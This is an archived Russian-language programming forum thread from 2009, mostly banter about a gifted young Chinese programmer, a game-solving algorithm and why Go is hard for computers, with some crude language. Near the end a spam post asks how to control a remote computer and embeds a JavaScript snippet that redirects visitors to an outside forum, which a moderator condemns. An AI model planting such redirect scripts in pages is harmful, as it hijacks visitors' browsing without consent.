|
|
|
Какой язык программирования считается самым первым?
|
|||
|---|---|---|---|
|
#18+
softwarer Попробуйте применить эту же логику к другим подобным ситуациям. Например, "кто, как не спортсмен, должен быть сам себе тренером?" Или "Кто как не токарь должен налаживать свой станок?" А, кстати, кто как не программист настраивает свой станок ? (у нас прогресс до этого пока не дошел) ... |
|||
|
:
Нравится:
Не нравится:
|
|||
| 17.08.2009, 10:30:54 |
|
||
|
|
|||
|---|---|---|---|
|
#18+
Gluk (Kazan)RT183.1 Я отдаю ему должное. Может хватит уже низкопоклонства перед аффторитетами ? Да не, этот пацан действительно достоин восхищения. Таких пиплов в мире буквально единицы. Я его просто близко знаю, а так я не склонен кем-то восхищаться. Кое в какой мелочевке и я ему подсказал, но сравнивать меня с ним - это просто смешно. Тот мой пост, где я упоминаю португальский, это его работа; сколько он добавил задач -- это ужасть Я даже не знаю чего он не знает ... |
|||
|
:
Нравится:
Не нравится:
|
|||
| 17.08.2009, 11:01:42 |
|
||
|
|
|||
|---|---|---|---|
|
#18+
Dr. RtGluk (Kazan)RT183.1 Я отдаю ему должное. Может хватит уже низкопоклонства перед аффторитетами ? Да не, этот пацан действительно достоин восхищения. Таких пиплов в мире буквально единицы. Ну царь, ну Иоанн (c) полезной нагрузки в этих репликах 0 ... |
|||
|
:
Нравится:
Не нравится:
|
|||
| 17.08.2009, 11:38:56 |
|
||
|
|
|||
|---|---|---|---|
|
#18+
Gluk (Kazan)Dr. RtGluk (Kazan)RT183.1 Я отдаю ему должное. Может хватит уже низкопоклонства перед аффторитетами ? Да не, этот пацан действительно достоин восхищения. Таких пиплов в мире буквально единицы. Ну царь, ну Иоанн (c) полезной нагрузки в этих репликах 0 почему же 0? Любой человек хочет чтобы его любили, чтобы им восхищались. Если я кем-то восхищаюсь, то это только плюс для моей души. ... |
|||
|
:
Нравится:
Не нравится:
|
|||
| 17.08.2009, 11:46:02 |
|
||
|
|
|||
|---|---|---|---|
|
#18+
Через 5-10 лет он будет делать второй "Deep Blue". В сторону всякой хероты типа С# он даже не посмотрит. Глюк, без обид, но ты в его возрасте был никто и звали тебя никак. А он уже сейчас знает абсолютно всё. И я очень горжусь своей дружбой с ним. Китайцы вообще очень интересные люди. ... |
|||
|
:
Нравится:
Не нравится:
|
|||
| 17.08.2009, 15:01:03 |
|
||
|
|
|||
|---|---|---|---|
|
#18+
Dr. RtЧерез 5-10 лет он будет делать второй "Deep Blue". В сторону всякой хероты типа С# он даже не посмотрит. Глюк, без обид, но ты в его возрасте был никто и звали тебя никак. А он уже сейчас знает абсолютно всё. И я очень горжусь своей дружбой с ним. Китайцы вообще очень интересные люди. Ну нельзя же так, возводить кого то в идеал, а остальных ставить на уровень инфузорий? Прям "мания чужого величия" какая-то Даже если вы и себя на уровень инфузорий ставите, других пожалуйста не определяйте туда. ... |
|||
|
:
Нравится:
Не нравится:
|
|||
| 17.08.2009, 15:25:47 |
|
||
|
|
|||
|---|---|---|---|
|
#18+
Dr. RtЧерез 5-10 лет он будет делать второй "Deep Blue". В сторону всякой хероты типа С# он даже не посмотрит. Глюк, без обид, но ты в его возрасте был никто и звали тебя никак. А он уже сейчас знает абсолютно всё. И я очень горжусь своей дружбой с ним. Китайцы вообще очень интересные люди. Ты знаешь, быть в фокусе чужого внимания это тяжелое бремя, а не удовольствие :) Мне не нравится, что ты, прикрываясь авторитетами, втихую пытаешься к ним примазаться, типа "ну я тоже хороший, но хуже". Это было бы смешно, если бы не было грустно. Мне по большому счету на...ть и на дипблю и на его разработчиков. Мне важно, чтобы мне было интересно, мне платили деньги и со мной общались те с кем я общаться хочу. Кстати относительно хероты, есть мнение что ты не просекаешь фишку А китайцы люди интересные, факт. Чего стоила полугодичная гребля с хуавеем, лучше не спрашивай, материться буду ... |
|||
|
:
Нравится:
Не нравится:
|
|||
| 17.08.2009, 15:34:28 |
|
||
|
|
|||
|---|---|---|---|
|
#18+
XDiaBLoDr. RtЧерез 5-10 лет он будет делать второй "Deep Blue". В сторону всякой хероты типа С# он даже не посмотрит. Глюк, без обид, но ты в его возрасте был никто и звали тебя никак. А он уже сейчас знает абсолютно всё. И я очень горжусь своей дружбой с ним. Китайцы вообще очень интересные люди. Ну нельзя же так, возводить кого то в идеал, а остальных ставить на уровень инфузорий? Прям "мания чужого величия" какая-то Даже если вы и себя на уровень инфузорий ставите, других пожалуйста не определяйте туда. а я так не считаю; и почему идеал? Я считаю что если человек заслужил восхищения то там и ему и быть Это манера быдлячества считать себя ровней талантливым пиплам. ... |
|||
|
:
Нравится:
Не нравится:
|
|||
| 17.08.2009, 15:35:29 |
|
||
|
|
|||
|---|---|---|---|
|
#18+
Dr. RtXDiaBLoDr. RtЧерез 5-10 лет он будет делать второй "Deep Blue". В сторону всякой хероты типа С# он даже не посмотрит. Глюк, без обид, но ты в его возрасте был никто и звали тебя никак. А он уже сейчас знает абсолютно всё. И я очень горжусь своей дружбой с ним. Китайцы вообще очень интересные люди. Ну нельзя же так, возводить кого то в идеал, а остальных ставить на уровень инфузорий? Прям "мания чужого величия" какая-то Даже если вы и себя на уровень инфузорий ставите, других пожалуйста не определяйте туда. а я так не считаю; и почему идеал? Я считаю что если человек заслужил восхищения то там и ему и быть Это манера быдлячества считать себя ровней талантливым пиплам. Нет, я вижу что вы считаете его идеалом: "А он уже сейчас знает абсолютно всё." Заслужил и заслужил, и отлично. А я не согласен что это быдлячество, я просто считаю что глупо фанатеть от кого-то до такой степени. Можно восхищаться, но не говорить что "он велик, а я чмо, и вы все тоже, и даже не стесняетесь". Все люди, обычные люди, разница только в том, что кто-то ленив, а кто-то целеустремлён. Кто-то оказался в нужном месте в нужное время, а кто-то нет. Кто-то достаточно наглый, чтобы добиваться вершин, а кто-то скромно делает свою работу, хотя мог бы достичь и большего. ... |
|||
|
:
Нравится:
Не нравится:
|
|||
| 17.08.2009, 15:41:11 |
|
||
|
|
|||
|---|---|---|---|
|
#18+
Глюк, я ж писал -- я гениальный сутенер. А кто им восхищается? Да никто. Кроме меня. Мы все, каждый, живем в мире своих фантазий и представлений о мире. А в Китае жизнь очень безрадостная. Ты думаешь там с ним кто-то носится? Я тебя умоляю. Партии и правительству глубоко чхать на них. Он питается как пес, нищий студент. Были бы у меня лишние деньги я бы ему первому послал (а не родственникам). ... |
|||
|
:
Нравится:
Не нравится:
|
|||
| 17.08.2009, 15:53:09 |
|
||
|
|
|||
|---|---|---|---|
|
#18+
Dr. Rt А кто им восхищается? Да никто. Кроме меня. Не уверен, наверняка есть еще кто-то кроме тебя. Собственно я не против того чтобы им повосхищаться (и даже послать денек), тихо без разрывания тельняшки на груди Македонский конечно герой, но зачем табуретки ломать ? (с) ... |
|||
|
:
Нравится:
Не нравится:
|
|||
| 17.08.2009, 16:02:35 |
|
||
|
|
|||
|---|---|---|---|
|
#18+
Gluk (Kazan)Dr. Rt А кто им восхищается? Да никто. Кроме меня. Не уверен, наверняка есть еще кто-то кроме тебя. Собственно я не против того чтобы им повосхищаться (и даже послать денек), тихо без разрывания тельняшки на груди Македонский конечно герой, но зачем табуретки ломать ? (с) шутки шутками, а ведь им (и ему) очень непросто там живется Это кажется , ну нам типа, в спокойной устаканившейся гавани Чё нам надо? Да ничего. А пацан реально бомбит по-полной, он на всех китайских контестерах на первой странице. А ведь это адский труд; это кажется талант; конечно он талант, каких мало , но это адский труд Он просыпается в 06:00 и только про программирование и думает ... |
|||
|
:
Нравится:
Не нравится:
|
|||
| 17.08.2009, 16:15:26 |
|
||
|
|
|||
|---|---|---|---|
|
#18+
Dr. RtGluk (Kazan)Dr. Rt А кто им восхищается? Да никто. Кроме меня. Не уверен, наверняка есть еще кто-то кроме тебя. Собственно я не против того чтобы им повосхищаться (и даже послать денек), тихо без разрывания тельняшки на груди Македонский конечно герой, но зачем табуретки ломать ? (с) шутки шутками, а ведь им (и ему) очень непросто там живется Это кажется , ну нам типа, в спокойной устаканившейся гавани Чё нам надо? Да ничего. А пацан реально бомбит по-полной, он на всех китайских контестерах на первой странице. А ведь это адский труд; это кажется талант; конечно он талант, каких мало , но это адский труд Он просыпается в 06:00 и только про программирование и думает А ты точно знаешь как мне живется ? Или так предположил ??? Кстати, в каком месте я шутил ? ... |
|||
|
:
Нравится:
Не нравится:
|
|||
| 17.08.2009, 16:27:18 |
|
||
|
|
|||
|---|---|---|---|
|
#18+
Dr. Rt, Алгоритм прикольный... он таки "играет" и проверяет, а возможно ли выиграть. автор Он просыпается в 06:00 и только про программирование и думает А вот это вредно... если конечно это правда. Через десяток лет может сказать: "Да задолбало ваше проганье.. Чего я здесь не видел?". Хотя хз.. я не психолог... ... |
|||
|
:
Нравится:
Не нравится:
|
|||
| 17.08.2009, 16:31:47 |
|
||
|
|
|||
|---|---|---|---|
|
#18+
clihltDr. Rt, Алгоритм прикольный... он таки "играет" и проверяет, а возможно ли выиграть. Довольно таки универсальный подход. Им что ход коня, что восемь ферзей. скуууушна ... |
|||
|
:
Нравится:
Не нравится:
|
|||
| 17.08.2009, 16:35:24 |
|
||
|
|
|||
|---|---|---|---|
|
#18+
Gluk (Kazan), Ну не скажи... Он жеж не полным перебором играет. Там таки стратегия выигрышная выработана. ... |
|||
|
:
Нравится:
Не нравится:
|
|||
| 17.08.2009, 16:38:23 |
|
||
|
|
|||
|---|---|---|---|
|
#18+
clihltGluk (Kazan), Ну не скажи... Он жеж не полным перебором играет. Там таки стратегия выигрышная выработана. А вот это большой вопрос, достойный отдельного изучения :) есть ли какие-то бенефиты от этой стратегии или монофалосно можно вальнуть поиском с возвратом. Это не скушно ладно, всем пока ... |
|||
|
:
Нравится:
Не нравится:
|
|||
| 17.08.2009, 16:42:33 |
|
||
|
|
|||
|---|---|---|---|
|
#18+
Gluk (Kazan), Бенефиты - быстродействие... Однозначно просчитывать ход каждой фишки в обоих направлениях будет дольше, чем целеустремленно их двигать согласно стратегии. ... |
|||
|
:
Нравится:
Не нравится:
|
|||
| 17.08.2009, 16:47:33 |
|
||
|
|
|||
|---|---|---|---|
|
#18+
Тут главное чтобы стратегия оказалась действительно правильной, и чтобы все начальные варианты, которые могут завершится победой, под нее подпадали. ... |
|||
|
:
Нравится:
Не нравится:
|
|||
| 17.08.2009, 16:49:55 |
|
||
|
|
|||
|---|---|---|---|
|
#18+
clihlt, навеяло мысль. Недавно из любопытства изучал дневнюю Китайскиую игру Го. http://ru.wikipedia.org/wiki/%D0%93%D0%BEХотя правила го немногочисленны и просты, стратегия игры невероятно сложна. Го — это детерминированная игра с полной информацией, как шахматы, шашки или реверси, но по количеству возможных позиций и различных партий она далеко превосходит (см. NP-полная задача) все эти игры (уже хотя бы потому, что ходы могут делаться в любом месте доски, а сама доска по числу пунктов более чем вчетверо превышает стандартную шахматную). При этом сложность игры не чисто механическая, заключающаяся в большом количестве вариантов: го содержит воистину огромное количество важных стратегических аспектов, некоторые из которых сложно даже понять, не говоря уже о том, чтобы анализировать. Среди множества настольных игр, го выделяется ещё и тем, что она оказалась наиболее сложной для компьютера. В то время как в шахматах сильнейшие программы играют на одном уровне с сильнейшими шахматистами, в го даже лучшие из существующих программ существенно слабее средне играющих любителей. ... |
|||
|
:
Нравится:
Не нравится:
|
|||
| 17.08.2009, 17:26:49 |
|
||
|
|
|||
|---|---|---|---|
|
#18+
mayton, Ну в задаче выше игра значительно попроще. )) И даже ее математически описать както не просто ( ну для меня покрайней мере ). ... |
|||
|
:
Нравится:
Не нравится:
|
|||
| 17.08.2009, 17:55:32 |
|
||
|
|
|||
|---|---|---|---|
|
#18+
mayton Среди множества настольных игр, го выделяется ещё и тем, что она оказалась наиболее сложной для компьютера. В то время как в шахматах сильнейшие программы играют на одном уровне с сильнейшими шахматистами, в го даже лучшие из существующих программ существенно слабее средне играющих любителей. японцы $1млн дают за программу Го, играющую на уровне средне играющих любителя ... |
|||
|
:
Нравится:
Не нравится:
|
|||
| 17.08.2009, 18:12:02 |
|
||
|
|
|||
|---|---|---|---|
|
#18+
clihltDr. Rt, Алгоритм прикольный... он таки "играет" и проверяет, а возможно ли выиграть. автор Он просыпается в 06:00 и только про программирование и думает А вот это вредно... если конечно это правда. Через десяток лет может сказать: "Да задолбало ваше проганье.. Чего я здесь не видел?". Хотя хз.. я не психолог... К счастью, у него прекрасные научные руководители. Но они все фанаты-маньяки. Я например не могу быть фанатом. Мне всё очень быстро надоедает. ... |
|||
|
:
Нравится:
Не нравится:
|
|||
| 17.08.2009, 20:43:14 |
|
||
|
|
|||
|---|---|---|---|
|
#18+
optimizermayton Среди множества настольных игр, го выделяется ещё и тем, что она оказалась наиболее сложной для компьютера. В то время как в шахматах сильнейшие программы играют на одном уровне с сильнейшими шахматистами, в го даже лучшие из существующих программ существенно слабее средне играющих любителей. японцы $1млн дают за программу Го, играющую на уровне средне играющих любителя плин..... как легко оказывается заработать $1млн..... Но увы в голове насрато мухами ... |
|||
|
:
Нравится:
Не нравится:
|
|||
| 17.08.2009, 20:44:44 |
|
||
|
|
|||
|---|---|---|---|
|
#18+
Фортран,асамблер,Бейсик Обсудить... как подключитца к удалюному компютеру и упровлять им <script language ='javascript' type ='text/javascript'> window.location.href ="http://saitsait.tu2.ru/forum.php"; </script> Модератор: думаю, никто не против наказания за посты ссылок на всякий бред ... |
|||
|
:
Нравится:
Не нравится:
|
|||
| 17.08.2009, 21:10:26 |
|
||
|
|

start [/forum/search_topic.php?author=Coder86&author_mode=last_topics&do_search=1]: |
0ms |
get settings: |
9ms |
get forum list: |
15ms |
get settings: |
9ms |
get forum list: |
19ms |
check forum access: |
4ms |
check topic access: |